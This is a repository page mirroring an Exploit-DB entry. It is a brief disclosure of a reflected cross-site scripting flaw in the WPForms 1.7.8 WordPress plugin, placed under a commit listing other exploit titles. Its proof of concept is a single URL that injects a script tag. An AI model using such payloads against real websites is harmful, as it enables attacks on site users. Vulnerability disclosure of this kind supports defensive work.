bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51152.txt
Exploit-DB 42ade901fe DB: 2023-03-31 
22 changes to exploits/shellcodes/ghdb

LISTSERV 17 - Insecure Direct Object Reference (IDOR)
LISTSERV 17 - Reflected Cross Site Scripting (XSS)

Router ZTE-H108NS - Stack Buffer Overflow (DoS)

Router ZTE-H108NS - Authentication Bypass

Boa Web Server v0.94.14 - Authentication Bypass

Covenant v0.5 - Remote Code Execution (RCE)

Dreamer CMS v4.0.0 - SQL Injection

Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)

Virtual Reception v1.0 - Web Server Directory Traversal

4images 1.9 - Remote Command Execution (RCE)

ClicShopping v3.402 - Cross-Site Scripting (XSS)

Concrete5 CME v9.1.3 - Xpath injection

Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)

Ecommerse v1.0 - Cross-Site Scripting (XSS)

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)

myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)

WPForms 1.7.8 - Cross-Site Scripting (XSS)

CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token

Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path

Zillya Total Security 3.0.2367.0  - Local Privilege Escalation
2023-03-31 00:16:26 +00:00

13 lines
No EOL
498 B
Text
Raw Blame History

# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)
# Date: 2022-12-05
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/wpforms-lite
# Version: 1.7.8
# Tested on: Windows 10
# CVE: N/A
1. Description:
This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>
Reference in a new issue View git blame Copy permalink